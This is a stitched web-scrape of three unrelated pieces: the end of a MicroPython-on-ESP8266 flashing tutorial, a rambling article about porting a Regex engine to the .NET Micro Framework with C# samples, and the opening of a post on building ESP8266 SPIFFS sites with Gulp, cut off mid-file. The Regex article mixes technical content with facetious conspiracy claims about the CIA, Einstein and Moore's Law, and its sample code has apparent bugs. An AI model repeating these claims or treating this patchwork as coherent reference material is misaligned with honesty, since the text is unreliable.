text
stringlengths
454
608k
url
stringlengths
17
896
dump
stringclasses
91 values
source
stringclasses
1 value
word_count
int64
101
114k
flesch_reading_ease
float64
50
104
I am creating a RESTful webservice using ASP.NET MVC (not ASP.NET Web API). What I want to do is have every method in the controller return their result based on an input parameter (i.e. json or xml). If I were using ASP.NET Web API, the HttpResponseMessage works for this purpose. When I attempt to return an HttpResponseMessage from a controller in ASP.NET MVC, there is no detail. I have read that in this approach, I am supposed to use ActionResult. If I do this, then I need to create an XmlResult that inherits from ActionResult since it is not supported. My question is why HttpResponseMessage does not work the same in both situations. I understand that in Web API, we inherit from ApiController and in ASP.NET MVC we inherit from System.Web.Mvc.Controller. Any help is greatly appreciated. Thanks, EDIT 1 Much thanks to Fals for his input. My problem was in how to create an empty website and add all of the necessary functionality in. The solution was to use Nuget to get the packages mentioned in the comments and then to follow the steps in How to integrate asp.net mvc to Web Site Project. Web Api is a Framework to develop Restfull services, based on HTTP. This framework was separeted into another assembly System.Web.Http, so you can host it everywhere, not only in IIS. Web API works directly with HTTP Request / Response, then every controller inherit from IHttpController. MVC has It's implementation on System.Web.Mvc. coupled with the ASP.NET Framework, then you must use It inside an Web Application. Every MVC controller inherits from IController that makes an abstraction layer between you and the real HttpRequest. You can still access the request using HttpContext.Response directly in your MVC controller, or as you said, inheriting a new ActionResult to do the job, for example: public class NotFoundActionResult : ActionResult { private string _viewName; public NotFoundActionResult() { } public NotFoundActionResult(string viewName) { _viewName = viewName; } public override void ExecuteResult(ControllerContext context) { context.HttpContext.Response.StatusCode = 404; context.HttpContext.Response.TrySkipIisCustomErrors = true; new ViewResult { ViewName = string.IsNullOrEmpty(_viewName) ? "Error" : _viewName}.ExecuteResult(context); } } This ActionResult has the meaning of respond thought HTTP Error.
https://codedump.io/share/mip6wcetGPjo/1/is-it-possible-for-aspnet-mvc-website-not-project-to-return-httpresponsemessage
CC-MAIN-2018-26
refinedweb
370
52.15
Hi, I made a simple program that reads 3 names from a text file, each of which has a first name, middle name and surname. I think there would be a few ways to improve the program, although I'm not sure how to go about it. So I have a couple of questions, if anyone could help: 1. When I create the three vectors of strings, if I don't start off by putting something into them, the program crashes when it's run (lines 19-21). How come? Is there any way I can save code by not having to put something in them when I create them? 2. Is there any way of avoiding having to declare three separate vector<string> variables? Would it be possible to do this using just a vector of vectors? Or could you do it using one vector that's just 3 x 3 strings? Would a list of vectors be better? Thanks guys. In the code, the file "names.dat" is just a text file with the following in: Arnold Adam Andrews Brian Barry Buttfield Colin Charles Coleman Code:#include <iostream> #include <string> #include <vector> #include <fstream> #define FIRSTNAME 0 #define MIDNAME 1 #define SURNAME 2 using namespace std; ifstream file_in("names.dat"); int main() { char charname[99]; string string_from_file; int pos; int num_of_lines = 0; int typeofname = 0; vector<string> first_names; vector<string> middle_names; vector<string> last_names; first_names.push_back(string_from_file); middle_names.push_back(string_from_file); last_names.push_back(string_from_file); while(!file_in.eof()) // Get the names from the names.dat file. { file_in.getline(charname, 99); pos = 0; while (typeofname <= SURNAME) { string_from_file[string_from_file.size()] = NULL; string_from_file.erase(0, 99); while (((typeofname<=MIDNAME) && (charname[pos] != ' ')) || ((typeofname==SURNAME) && (charname[pos]))) { string_from_file += charname[pos]; pos++; } pos++; if (typeofname == FIRSTNAME) first_names.push_back(string_from_file); else if (typeofname == MIDNAME) middle_names.push_back(string_from_file); else if (typeofname == SURNAME) last_names.push_back(string_from_file); typeofname++; } num_of_lines++; typeofname = 0; } for (typeofname = 0; typeofname <= SURNAME; typeofname++) // Output the names by type. { pos = 0; while (pos <= num_of_lines) { if (typeofname == FIRSTNAME) cout << first_names[pos] << endl; else if (typeofname == MIDNAME) cout << middle_names[pos] << endl; else if (typeofname == SURNAME) cout << last_names[pos] << endl; pos++; } } }
http://cboard.cprogramming.com/cplusplus-programming/116472-reading-multiple-multi-part-strings-text-file.html
CC-MAIN-2015-22
refinedweb
351
56.55
hello everyone! I am trying to make a memory match game. So far I have created the game screen with all of the cards on it. However I'm havin some trouble trying to figure out three things: (1) How do I created the reverse side of the card and make it flip to the other side when clicked? (2) How do you activate the mouse on the screen so you can click the cards? (3) And is there anyway I can display a timer that will count down and stop the game when it gets to zero? How do I create the reverse side of the card Well duh. You draw the back side in a bitmap editor. Then in-game instead of the face of the card you draw the back side. ...and make it flip to the other side when clicked? Check the values of mouse_x, mouse_y and mouse_b&1 and when they indicate a card has been clicked, play the flip animation. A simple way to do this is to progressively stretch the back side to a smaller size in one dimension and then when it reaches 0, progressively draw the face stretched to a bigger size until it reaches full size. How do you activate the mouse on the screen so you can click the cards? install_mouse()RTFM, the rest of the mouse routines section as well. You can have Allegro or the underlying system draw the mouse cursor for you, or you can draw it yourself with draw_sprite(). And is there anyway I can display a timer that will count down and stop the game when it gets to zero? Yes. RTFM, the sections about timers and text output. --sig used to be here Search the forums for "timers". Welcome, jetzfan. (1) How do I created the reverse side of the card and make it flip to the other side when clicked? Sounds like you need to keep track of the card states somewhere; like have a int flipped_flag with possible values 0=facedown and 1=faceup. (2) How do you activate the mouse on the screen so you can click the cards? See Miran's post; installmouse(); There should be a program in the examples that uses the mouse, you can check that to see how it's done. (3) And is there anyway I can display a timer that will count down and stop the game when it gets to zero? Again, see the examples to see an example of using timers. link to my blog ok if i can get the cards to flip over...how can i make them stay facing up if they are a match then flip back over if they don't make? can someone show me some code to do this? can someone show me some code to do this? C or C++? C Hope that gives you an idea, I've commented out the code you are supposed to implement, but it should give you a framework to start with. ___________________________________[ Facebook ]Microsoft is not the Borg collective. The Borg collective has got proper networking. - planetspace.deBill Gates is in fact Shawn Hargreaves' ßî+çh. - Gideon Weems thank you very much....but how do you do this: init_cards(&cards); // intialize your deck with random card types and two of each and all face down I'm very sorry...I'm not good at this at all...like I said I'm very new at this! There is a ton of ways to do it but here is my example: Untested but I hope it gives you an idea, you go through each type of card and assign it to a random index of your array if it's not already taken. You have to do it twice because there are two of each card. This is just one way of doing it out of many. am I doing this the right way...or is there a more simplier way to do this. I feel like i'm going about this the wrong way?! Nothing in code happens magically, this is the way I know and it should work. If you want simpler than I suggest trying something else, get a good C book and read up on stuff before jumping into a graphical game environment. I'm not sure what you mean by simpler. luvzjetz16, maybe you should post the code YOU have written so far. In your first post you say So far I have created the game screen with all of the cards on it. Could you post that code here? yep...here it is: #include <allegro.h> void init();void deinit(); int main() {init(); //before the game page there are two other pages that I have no problem with //game pageinstall_mouse();show_mouse(screen);int c; BITMAP *img3, *cursor, *cursor2, *cursor3, *cursor4, *cursor5, *cursor6; img3 = load_bmp("c:\\familyguylogo.bmp",NULL);cursor = load_bmp("c:\\PETER.bmp",NULL);cursor2 = load_bmp("c:\\LOIS.bmp",NULL);//etc..... blit(img3, screen, 0,0,0,0,640,480);stretch_blit(img3, screen, 0,0, img3->w, img3->h, 0,0, SCREEN_W, SCREEN_H); draw_sprite(screen, cursor, 50, 75);draw_sprite(screen, cursor2, 50, 200);draw_sprite(screen, cursor3, 195, 75);draw_sprite(screen, cursor4, 195, 200);draw_sprite(screen, cursor5, 337, 75);draw_sprite(screen, cursor6, 337, 200);draw_sprite(screen, cursor, 480, 75);draw_sprite(screen, cursor3, 480, 200);draw_sprite(screen, cursor3, 50, 325);draw_sprite(screen, cursor4, 195, 325);draw_sprite(screen, cursor5, 337, 325);draw_sprite(screen, cursor6, 480, 325); for(c=0;c<2000000000;c++);system("cls") Use the code mockup tags please. Have you ever heard of arrays? yeah i've heard of arrays. what are mockup tags? If you notice my code is in a scrollable text box, use:[CODE]int c;[/CODE]in lower case to use code blocks in your post. There is a link called HTML Mockup Code at the top of the post text box you can click to see all of the available tags. OK, let me guess - before C you have written your programs in BASIC? My advice is to learn the language you are dealing with. You don't know about the basic features of C, so you are obviously stuck with no knowledge.Just one example:Instead of calling your variables cursor,cursor2,cursor3,cursor4,... you can do the following: BITMAP *cursor[6]; cursor[0] = load_bmp("...bmp",NULL); cursor[1] = load_bmp("...bmp",NULL); ... That way you can say for (c=0;c<6;c++) { draw_sprite(screen,cursor[c],c*100,10); } or something like that. And instead of for(c=0;c<2000000000;c++); you can say (in Allegro) rest(2000); which will pause your game for exactly 2 seconds (2000 1/1000s of a second). Of course these are just basic concepts and they won't give you a memory game. You have a lot to learn. First try to cope with C, and then with Allegro.[append]On a second thought you could make a memory game by making use of the little programming knowledge you have, but I'm afraid you wouldn't learn anything. Trust me, I've seen huge games from newbies like you, some guys even managed to do (text-based) RPGs without using loops, because they just didn't know them.Nevertheless I encourage you to learn at least the basics of C (;D pun) before continuing. is this better?! Yes, nothing after system("cls") though? I don't know how you managed to get that to compile. sorry it didnt copy and paste here it is: this part is created for me when I opened an allegro C project in DEV C++ Read Simons post, he said it best. I'm not sure I can help you much more. ok guys....i've used Dev C++ for the past semester in college. I do know how to use arrays and things to make a memory game, but I don't know how to make that same game with just BITMAPS and sprites. I do know how to use arrays and things to make a memory game, but I don't know how to make that same game with just BITMAPS and sprites. You have to use both..... Make the game like you would with an array, then use allegro to give it a graphical interface. This is were the creativety comes into programming; to explain better would be to program it for you? To answer your first question, just make variables. So for each card you have a variable "flipped" that indicates if the card is flipped or not. When the user clicks on one card you set flipped to 0 instead of 1. In your drawing code you have an if, or better said, several ifs. You would save a lot of code by using a combination of structs and arrays, but you obviously can do without them. By declaring ~50 different variables at the beginning of your code. I did that once, and it was no fun.
https://www.allegro.cc/forums/thread/588872/632314
CC-MAIN-2018-51
refinedweb
1,500
81.12
Odoo Help Odoo is the world's easiest all-in-one management software. It includes hundreds of business apps: CRM | e-Commerce | Accounting | Inventory | PoS | Project management | MRP | etc. how to remove the duplicate number of elements in list? iam hving list with repeated elements. so in this case how to delete the duplicate elements in the list using python? For example: def formatList(seq): seen = set() seen_add = seen.add return [ x for x in seq if not (x in seen or seen_add(x))] There are loads of topics about this on stackoverflow and Google. This example is taken from and also keeps the order of your list! A second option could be to create a second list, which only contains the clean values. In case you would like to keep both lists. for i in mylist: if i not in newlist: newlist.append(i) I usually used list_wo_no_duplicate = list(set(list_with_ducplicates)) to remove duplicates. Although I think there is no harm for not setting the variable to list again as set in most cases. About This Community Odoo Training Center Access to our E-learning platform and experience all Odoo Apps through learning videos, exercises and Quizz.Test it now
https://www.odoo.com/forum/help-1/question/how-to-remove-the-duplicate-number-of-elements-in-list-73587
CC-MAIN-2017-30
refinedweb
201
67.25
Just a bit of history on binding. In Click 1.4 binding was introduced because people wanted a shortcut for binding and converting input params. This was in the Java 1.4 days, pre annotation. So public fields was used as binding. With Java 1.5 Bindable was introduced but backward compatibility was kept in place. (If you want to use public fields in your pages that should not be bound, you can set autobinding="annotation" and public fields won't be touched.) So the intention wasn't to support both public fields and @Bindable. It was for preserving backwards compatibility. I understand the argument of splitting @Bindable into two behaviors -> @InputParameter (which sets and coerce the value vs @AddToModel which adds the value to the model. The Bindable design also raised these issues: but this work was never completed. Kind regards Bob On 21/11/2010 01:49, Lorenzo Simionato wrote: > On Nov 20, 2010, at 14:35 , Bob Schellink wrote: > > Here what i meant is that if you declare a field as @Bindable you are clearly aware that it can be set in some way by the user. > If you have a public field (ok, it's rare) this is not that obvious. > > Here the XSS was just an example. The fact that one can set a value that i intended only for output is disturbing. > As a couple of other examples: > -suppose the welcomeMessage is the title of the page. It's not nice that one can put an arbitrary title on the page, even if it is escaped properly. > > -suppose one modifies the RequestTypeConverter as explained in the documentation to dynamically load customers from the db. > In a page one would like to do something with a customer object and then print the details, so we could have something like: > MyPage.class > public class MyPage extends Page { > @Bindable protected Customer customer = loadCustomer(3); > > pubic void action() { > customer.set.....(); > } > > MyPage.html > $customer.name > > a different customer can be loaded with a request like mypage.htm?customer=56 > (this example is a little weird but is just to get the idea) > > > These are just examples and maybe if all is handled very carefully by the programmer there would not be any problems. > However, they demonstrate that it is easy to make something that does not work as intended. > As a last example consider SQL Injections: if you escape the input properly you do not have the problem. On the other hand, > to prevent the problem even if you are not that careful PHP has introduced magic quotes and in Java we have preparedStatements (yes i'm simplifying a lot the things here!). The concept is that this double role of public field and ones annotated with @Bindable (as parameters and variables added to the page) it does not seem a good idea to me. > > -- > Lorenzo
http://mail-archives.apache.org/mod_mbox/click-dev/201011.mbox/%3C4CE86E0A.5060608@gmail.com%3E
CC-MAIN-2019-51
refinedweb
477
63.39
27 April 2011 19:30 [Source: ICIS news] HOUSTON (ICIS)--US propylene inventories and refinery operating rates were steady during the week ended 22 April, government data showed on Wednesday. Refinery-sourced propylene inventories stood at 1.573m bbl, down by a slight 0.7% from a week earlier, the US Energy Information Administration (EIA) said. ?xml:namespace> EIA figures refer to non-fuel-use propylene, which is intended for petrochemical manufacturing, including polymer-grade propylene and chemical-grade propylene. Refinery-grade propylene for May traded at 90.75 cents/lb ($2,001/tonne, €1,361/tonne) on Wednesday, up from a deal done at 79.50 cents/lb in the first week of the month. For more on propylene, visit ICIS chemical intelligence (
http://www.icis.com/Articles/2011/04/27/9455632/us-propylene-stocks-refinery-rates-steady-eia.html
CC-MAIN-2014-42
refinedweb
124
51.14
Unlike sprintf(), maximum number of characters that can be written to the buffer is specified in snprintf(). snprintf() prototype int snprintf( char* buffer, size_t buf_size, const char* format, ... ); The snprintf() function writes the string pointed to by format to buffer. The maximum number of characters that can be written is (buf_size-1). After the characters are written, a terminating null character is added. If buf_size is equal to zero, nothing is written and buffer may be a null pointer. It is defined in <cstdio> header file. snprintf() Parameters - buffer: Pointer to the string buffer to write the result. - buf_size: Specify maximum number of characters to be written to buffer which is buf_size-1. -. snprintf() Return value If successful, the snprintf() function returns number of characters that would have been written for sufficiently large buffer excluding the terminating null character. On failure it returns a negative value. The output is considered to be written completely if and only if the returned value is nonnegative and less than buf_size. Example: How snprintf() function works #include <cstdio> #include <iostream> using namespace std; int main() { char buffer[100]; int retVal, buf_size = 100; char name[] = "Max"; int age = 23; retVal = snprintf(buffer, buf_size, "Hi, I am %s and I am %d years old", name, age); if (retVal > 0 && retVal < buf_size) { cout << buffer << endl; cout << "Number of characters written = " << retVal << endl; } else cout << "Error writing to buffer" << endl; return 0; } When you run the program, the output will be: Hi, I am Max and I am 23 years old Number of characters written = 34
https://cdn.programiz.com/cpp-programming/library-function/cstdio/snprintf
CC-MAIN-2021-04
refinedweb
258
60.14
Need help with Java Class in Matlab in windows 10 5 views (last 30 days) Show older comments Edited: Ajith Krishna Kanduri on 19 Jun 2020 I have studied examples and had success with the java class example "HelloWorld" but have not been able to get the Addnumber example shown to work. This example was located on this site. Based on post I created a java class as shown below. package numberpack; public class Addnumber { public double add2num( double a1,double a2) { return a1+a2; } } I compiled the class and in matlab used: obj = numberpack.Addnumber to access the object but get the message: "Unable to resolve the name numberpack.Addnumber." My path to the class is valid as it is in the file classpath.txt. Answers (1) Ajith Krishna Kanduri on 19 Jun 2020 Edited: Ajith Krishna Kanduri on 19 Jun 2020 Hi, Please try using () parenthesis for creating the object. obj = numberpack.Addnumber() Please refer to the following discussion thread for the reference Hope this helps in resolving the issue. See Also Community Treasure Hunt Find the treasures in MATLAB Central and discover how the community can help you!Start Hunting!
https://it.mathworks.com/matlabcentral/answers/542453-need-help-with-java-class-in-matlab-in-windows-10?s_tid=prof_contriblnk
CC-MAIN-2022-27
refinedweb
193
58.92
HIOB: How to Generate Web Backdoors { PHP } Using Weevely in Kali Linux A backdoor in a computer system. That's what pretty much happens when we all get root on Web Servers. "Hell Yeah, We need Backdoors for next-time". Sometimes, we upload shells and scripts for connect backs which are awesome. One-day i surfed to a site, got the c99 source, copied it, tried saving it and Gosh the worst happened to me: Windows and Avast won't let me save it because these shells have their sources and signatures marked up as virus on nearly every system. The Only way one get's a secure shell on a server is only through creating your own. Kali Linux has the functionality to generate almost every backdoor type depending on how u want it. { PHP, Android,Windows } to mention a few. But i would be basing on weevely for this post. These shells won't be 100% undetectable but they could atleast get us a better and safe connect back. Weevely PHP Only Fire Up Kali Drop your consoles or terminals as u may prefer to call it and lets get some work-done. Weevely First hit weevely in your terminal to get the help interface > weevely Yeah that seems promising. Now to generate our back-door, Weevely allows us to password protect our shell to prevent unauthorized access. We are generating a backdoor so we choose option 4 - Generate a PHP Backdoor. > weevely generate skyvenom Lets break this down weevely generate skyvenom simples tells: weevely to generate a php shell with a password of "skyvenom" in the current directory. Hit ' ls ' in your terminal and you should see a weevely generated file. > ls Now you have your backdoor: How you get it onto a web server is not my part so please try as much as possible not to get caught otherwise, hmm: Let me be precise in betweeon 10 to 15 years in jail since hacking is now considered a great threat to the systems now. Let's assume u got your shell on a web server, To connect to our shell we use > weevely weburl password >weevely skyvenom Hmm, Its really awesome to get a shell on your localhost than any other place in the world.As u can see : Have got a shell on the target in my LAN. 10.0.2.2 Ok, Guys. Have a nice day. Note Only: For Educational Purposes, Hmm i always see that shitty crap around: Educational Purposes : but to get my butts safe from your works: For Education Purposes. Prompt me if i mistyped or made an error. Jes, My waist ... Hm i wonder how OTW,ghost and others suffer their butt's up to get us a nice tut for the day. Thanks Guys and keep the work up. #Sky 6 Responses Intersting post. Some newbies might not understand the topic, you might try to improve the introduction, as some terms are not very common. Headlines make things easier to read. You might consider to explain how the back door is started, however this is a good reference, thank you for publishing. I see it's your first how-to on Null Byte. Keep it up ;) Yo Ciuffy, Thanks for your comment and it's kind of my first time so hope to clean up my writing skills. #Sky thnx for sharing...i dont think there is a tool for uploding your shell to a server...wait...i think metasploit will do that...will it? and by the way...iliked the last part :) it is giving me this error: Traceback (most recent call last): File "./weevely.py", line 98, in <module> main(arguments) File "./weevely.py", line 48, in main modules.loadmodules(session) File "/usr/share/weevely/core/modules.py", line 24, in loadmodules (modulegroup, modulename), fromlist="*" File "/usr/share/weevely/modules/shell/php.py", line 4, in <module> from core.channels.channel import Channel File "/usr/share/weevely/core/channels/channel.py", line 8, in <module> import sockshandler ImportError: No module named sockshandler I tried to install sockshandler but no success. Follow this link: and utilize google more. Can I have some help of how to upload the shell? Share Your Thoughts
https://null-byte.wonderhowto.com/forum/hiob-generate-web-backdoors-php-using-weevely-kali-linux-0158905/
CC-MAIN-2017-17
refinedweb
706
74.19
#include <sw_list.h> #include <sw_types.h> Go to the source code of this file. header file for buddy allocator in Trustzone Kernel. function to get the size of a pointer. This is needed during realloc function to get the size of a pointer. This is needed during realloc allocates memory at the requested heap index for size bytes Prints the state of the heap allocations Whether heap is found for this task Heap size, no. of free and allocated blocks. Prints the heap memory allocation related address and sizes. Gets the task_id and frees the heap memory corresponding to the task_id. Frees the privately allocated memory pointing to the heap_id and the address pointer. Heap memory initialization. Gets the task id and allocates memory in the heap memory corresponding to the task. Frees the memory allocated by passing the address ptr. Initial Memory Allocation Heap also initialized. Allocates memory privately for size bytes at the memory related to heap_id passed.
http://www.openvirtualization.org/documentation/sw__buddy_8h.html
CC-MAIN-2018-39
refinedweb
160
60.82
So what are the thing we are going to learn today ? Well, we will learn about the system requirements and the installation of the Kinect device, which will ensure that our device setup properly and we are good to start with development. Get Ready with Your Development Environment The current version of Kinect for Windows SDK beta 1 needs below requirements to start Refer ^ for more information Download and Install Kinect for Windows SDK beta Download the SDK Beta, Once you have the development environment setup ready. Please make sure you are downloading the SDK Version based on 64bit or 32bit Operating System. Once done with download, install it. You really do not need to plugin your Kinect devices during the installation of SDK. Know your Kinect Device Before checking out Driver installation, let’s have a quick look into the basic H/W elements of Kinect. This contains 3d Depth Sensors, RGB Camera which is used for Video Capturing , Array of MIC and TILT. Kinect SDK provides some API to interact with motorized tilt to enables the camera up or down 27 degrees . This API is the part of Kinect Camera. I will be talking details about each and everything in my upcoming post while exploring the API’s for each every section. Plug in your Kinect USB cable with Computer. Once Windows detects the devices, you will get the LED Indicator blinking ( Yeah, this one is mine) . Wait for Windows to recognize the sponsor’s. You can check it out from Control Panel > Device Manager for the installed device driver. By default with only USB connection, Windows will detect only the device, as shown in below picture. But, Camera , Sensors and Audio is yet to detect. Here is a point, To detect all Kinect elements, device need some high power supply. For that you need to plug the power supply to your Kinect Device from external Power Source. This will enables windows to detect all the components of Kinect Devices. Here is the Quick Video for the Device detection. Test Your Device You have done with setup and installation. Let have a quick test your device. Kinect SDK installs few sample application , Sample Skeletal Viewer is one of them. Just run that application, you will able to see your view in Depth View Skeletal View and Camera View. If all of them are coming up. Your are all set to start development. What else Kinect SDK installed for Developers ? Yes, Kinect SDK also installed a best resource to learn Kinect SDK Development and Explore the APIs. This installation contains, Kinect SDK API Reference file. I learned most of the things from here itself. How Application Interacts with Kinect You have already installed SDK and Kinect Setup properly . So before start with development, let have a look how Application interacts with Kinect Devices. Kinect SDK Installed set of API to interact with Devices, You application will talk to those APIs and APIs will talk to Devices. Below images shows the same flow. Staring With Application Development : Finally all the setup are done. Let’s have start some development with Visual Studio 2010 and create a small application which will Initialize Kinect Sensor and display the Unique device name Fire a new instance of Visual Studio, Select New Project Option from file Menu and Select “WPF Application” Template , Give the name as “MyFirstKinectDemo” Click on OK, It will create a blank WPF Application for you. Before going ahead, first lets design the UI as show in below Below code snippet is the XAML markup for the above design. Well, its very simple. Now it’s time to interact with Kinect SDK API’s. To start with, you need to first add the reference of Kinect SDK assemblies. Navigate to solution explorer, Right Click on the Project and Select “Add Reference” The assembly you need to add is “Microsoft.Research.Kinect.dll” , You can search for Kinect keyword in the Assembly search text box to get it faster. This will add Microsoft.Research.Kinect.dll as reference to your project. The top level view of this assembly in Object Explorer given as below. These two are the different segment of Kinect APIs. If you want to interact with NUI ( Natural User Interface) API like camera, sensors, Skeleton viewer you have to use the below namespaces. If you want to interact with Kinect Audio Array, you have to include For this application, we will be using NUI API hence we will be adding below namespaces with our code. using Microsoft.Research.Kinect.Nui; First of all you need to define the runtime of Kinect as shown in below, this represents the instance of Kinect Sensor. After that, initialize the runtime with the options you want to use. Below are this Runtime options which Kinect Supports In the next article I will discuss more about the runtime options. For this example, use RuntimeOptions.UseColor to use the RGB camera. Below is complete Code snippet for Initialize and Uninitialized the Kinect Device. /// <summary> /// Interaction logic for MainWindow.xaml /// </summary> public partial class MainWindow : Window { /// <summary> /// /// </summary> Runtime nuiRuntime = new Runtime(); /// <summary> /// Initializes a new instance of the <see cref="MainWindow"/> class. /// </summary> public MainWindow() { InitializeComponent(); } /// <summary> /// Handles the Click event of the buttonInitialize control. /// </summary> /// <param name="sender">The source of the event.</param> /// <param name="e">The <see cref="System.Windows.RoutedEventArgs"/> instance containing the event data.</param> private void buttonInitialize_Click(object sender, RoutedEventArgs e) { // Intialize Kinect Device with UseColor Runtime Option nuiRuntime.Initialize(RuntimeOptions.UseColor); MessageBox.Show("Device Runtime Initialized"); //Get the Camera Device Name labelDeviceName.Content = nuiRuntime.NuiCamera.UniqueDeviceName; } /// <summary> /// Handles the Click event of the buttonUnInitialize control. /// </summary> /// <param name="sender">The source of the event.</param> /// <param name="e">The <see cref="System.Windows.RoutedEventArgs"/> instance containing the event data.</param> private void buttonUnInitialize_Click(object sender, RoutedEventArgs e) { // Uninitilize Runtime nuiRuntime.Uninitialize(); MessageBox.Show("Device Runtime UnInitialized"); } } That’s all, Run the Application and Click on “Initialize Kinect Runtime” , your application will initialize a runtime of Kinect device via SDK APIs and you will get below message as written in code. After the acceptance of the initialize message, you will get the Unique Camera device name. Clicking on “Uninitialized Kinect Runtime, button will execute the below code to uninitialized device Download Sample Well, That’s all . To Summarize the stuff what I have discussed till now is, setting up your development environment, installing Kinect SDK, Detecting the devices and a small application to initialize the Kinect devices. This is only the beginning, we will talk a lot more about API and will start with something new in my next post. Thanks ! Abhijit Good One WhOW… Sir… awesome…. 🙂 dont know when will I ever get my hands n that gift of GOD… Thanks a lot man! I successfully developed a whole application and the Kinect Sensor was unplugged from the power supply, so it wasn’t able to initialize the runtime. After searching for over an hour, this is the first post that helped me with the Driver setup. Really good… Helped me a lot… Thanks you are article is very good.but i don’t have kinect xbox how to capture video through windows c# application? Hello, I’ve tried to learn the basics of kinect-coding with your tutorial, but after the change of the API, I’ve had to change some parts of the code (Runtime = KinectSensor) . Unfortunately, C# tells me at “KinectSensor ks = new KinectSensor();” that there is no constructor defined. I’m very confused about that and so I would be rather pleased, if you could help me to understand / deal with it. Thanks in advance. Hi, This article is pretty old and wrote on Beta SDK. With the new SDK u will get reference of Kinect as KinectSensor sensor= KinectSensor.KinectSensors[0]; Now, you can start the sensor by using sensor.Start(); Let me know if you need any help on this. Would be happy to help. Thanks a lot, everything is working now. Thank you! Great ! Let me know if you need any further help on this ! Not Working with present SDK sir! Hi New SDK has many changes in APIs. I wrote this article with Beta 2. Sir pls give me sample code for power point using with kinect sdk 2.0 pls help me\ thanks\ Hello Abhijit Jana, I am about to start a project kinect sensor for Gestures(free control of medical Images,i.e zapping images, zooming or reduce images with gestures ). Here some information about my system:Windows 7 x64Bits Processor: Intel(R) Core (TM) i5-4200M CPU @ 2.50GHz 2.50GHz 4,00 GB 64Bit OS Visual Studio Express 2013. Is this Okay? I have ordered for a kinect Sensor . How do i check for ” Windows 7–compatible graphics card that supports DirectX® 9.0c capabilities” property What do you mean by “Microsoft .NET Framework 4.0” ? do i need to download it? Is SDK v 1.7 Okay in place of SDK Beta? Thanks in Advance for your kind reply Which version of Kinect You have order ? If it is V2, then you may start looking into Kinect SDK V2 .
https://abhijitjana.net/2011/09/14/development-with-kinect-net-sdk-part-i-installation-and-development-environment-setup/
CC-MAIN-2018-17
refinedweb
1,534
66.23
#include <db.h> int DB_ENV->remove(DB_ENV *, char *db_home, u_int32_t flags); The DB_ENV->remove function destroys a Berkeley DB environment if it is not currently in use. The environment regions, including any backing files, are removed. Any log or database files and the environment directory are not removed. The db_home argument to DB_ENV->remove is described in Berkeley DB File Naming. DB_ENV->remove. A DB_ENV handle that has already been used to open an environment should not be used to call the DB_ENV->remove function; a new DB_ENV handle should be created for that purpose. After DB_ENV->remove has been called, regardless of its return, the Berkeley DB environment handle may not be accessed again. The DB_ENV->remove function returns a non-zero error value on failure and 0 on success. The DB_ENV->remove function may fail and return a non-zero error for errors specified for other Berkeley DB and C library or system functions. If a catastrophic error has occurred, the DB_ENV->remove function may fail and return DB_RUNRECOVERY, in which case all subsequent Berkeley DB calls will fail in the same way.
http://pybsddb.sourceforge.net/api_c/env_remove.html
crawl-001
refinedweb
185
52.09
For. Cheap Prices Come with a Learning Curve One of the first languages many people learn for programming electronics is Arduino, which requires knowledge of the specific structure needed to make a sketch work. Because of the way microcontrollers run code, even a simple Arduino sketch will typically consist of two functions: setup and loop. To write a sketch that blinks an LED attached to pin D1 (also called GPIO pin 5), we can use the following sketch in Arduino to set the LED to output, turn it on for a second, and then turn it off for a second. void setup() { pinMode(D4, OUTPUT); } void loop() { digitalWrite(D4, HIGH); // turn the LED on (HIGH is the voltage level) delay(1000); // wait for one second digitalWrite(D4, LOW); // turn the LED off by making the voltage LOW delay(1000); // wait for another second } For this seemingly simple action, we have a lot of code that seems pretty unintuitive for a beginner to understand. What's happening in this program is that the setup function runs once, turning our D4 pin to output mode, and then the loop runs continuously to turn on and off the LED. While this is a simple sketch, MicroPython can make it even easier. MicroPython to the Rescue In MicroPython, we can do the same in a way that's clearly understandable in two lines. First, we import the modules we need, and then we spell out what we want to do in clear and straightforward Python. from time import sleep; from machine import Pin; led = Pin(2, Pin.OUT) # Imports modules and defines output pin 5 while True: led.on(); sleep(1); led.off(); sleep(1) # Blinks LED on and off forever If we want to get more technical, we can even write a function to read whether the LED is on or off and switch its state every second, all on the same line. This would require more setup on Arduino and is an excellent example of how MicroPython can make simple coding easy. We can also use Python tricks like ternary operators to make our code more compact without being too difficult to understand. In this structure, conditions are written as <expression1> if <condition> else <expression2>, allowing us to express both conditions and expressions on the same line. from time import sleep; from machine import Pin; led = Pin(2, Pin.OUT); while True: led.value(1) if (led.value() == 0) else led.value(0); sleep(1) Reading MicroPython vs. Arduino Of course, programming isn't about making your code as short as possible. If you want to abuse both languages, it's possible to write our code to blink an LED on a single line, but it's difficult to understand and generally not good practice. Here, we can see an abused one-line MicroPython program. exec("import time; machine; led = Pin(2, Pin.OUT)\nwhile True: led.on(); sleep(1); led.off(); sleep(1)") While this is definitely more difficult to read than the two-line version above, it's still much easier to understand than the abused Arduino version below. void setup() {pinMode(D4, OUTPUT);}void loop(){digitalWrite(D4,1);delay(1000);digitalWrite(D4,0);delay(1000);} MicroPython's real value isn't being more compact than Arduino. In general, those new to microcontrollers will have an easier time understanding and writing MicroPython code, as led.on() is a much easier command to remember than digitalWrite(D1,0) for turning on an LED. REPL & Web REPL Another feature of MicroPython is the ability to run code line by line, rather than needing to first compile it like in Arduino. That means if you want to start writing a program or working with a piece of hardware, you can connect to the REPL (read, evaluate, print loop) via a serial connection and input commands directly — no need to write an entire sketch first. There are many advantages to this, and while the REPL command-line interface isn't the only way to work with MicroPython, it's by far the fastest and easiest way to get started writing code on your microcontroller. Of course, we can also write Python files and upload them as well, but the simple ability to connect to an ESP8266 and create a Wi-Fi network in real-time is pretty amazing. MicroPython v1.11-8-g48dcbbe60 on 2019-05-29; ESP module with ESP8266 Type "help()" for more information. >>> print("Hello world!") Hello world! >>> This simple interface is available from the command line any time you connect your ESP8266 via a USB cable, and it can even be configured to work over Wi-Fi as well. What You'll Need To use MicroPython, you'll need an ESP8266-based microcontroller, such as the D1 Mini or NodeMCU. These boards are cheap and easy to find on websites like AliExpress and Amazon. You'll also need a computer with Python3 installed and a Micro-USB cable to connect to the board. You'll need an internet connection to download the MicroPython firmware binary, a breadboard for connecting components, and a three-color RGB LED to test our output pins. If you don't have a three-color RGB LED, you can use regular LEDs as well. Step 1: Download the ESPtool To download the tool we'll need for flashing to our ESP8266, we need to use Python's package manager, Pip. To do so, we can run the following command. If this doesn't work, you can also try replacing pip3 with pip. You can also try installing it manually from the GitHub repo. ~$ pip3 install esptool Collecting esptool Downloading (84kB) 100% |████████████████████████████████| 92kB 928kB/s Requirement already satisfied: ecdsa in /usr/lib/python3/dist-packages 